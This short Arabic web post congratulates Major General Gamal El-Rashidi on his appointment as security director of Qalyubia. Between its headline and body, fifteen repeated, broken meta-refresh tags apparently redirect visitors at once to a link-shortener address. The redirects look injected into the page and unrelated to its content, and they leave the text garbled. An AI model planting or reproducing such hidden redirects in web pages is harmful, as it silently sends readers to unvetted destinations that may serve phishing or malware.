بسام فايد يهنئ اللواء “جمال الرشيدي” لإختياره مديراً لأمن القليوبية

equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
يتقدم بسام فايد؛ بخالص التهانئ القلبية والتباريك الي اللواء جمال الرشيدي لإختياره مديراً لامن القليوبية .
مؤكداً أن ذلك يأتي في إطار حرص القيادة السياسية علي الدفع بعناصر وكفاءات مميزة ؛داعين لسيادته دوام الرفعه والسداد فى خدمة الوطن .





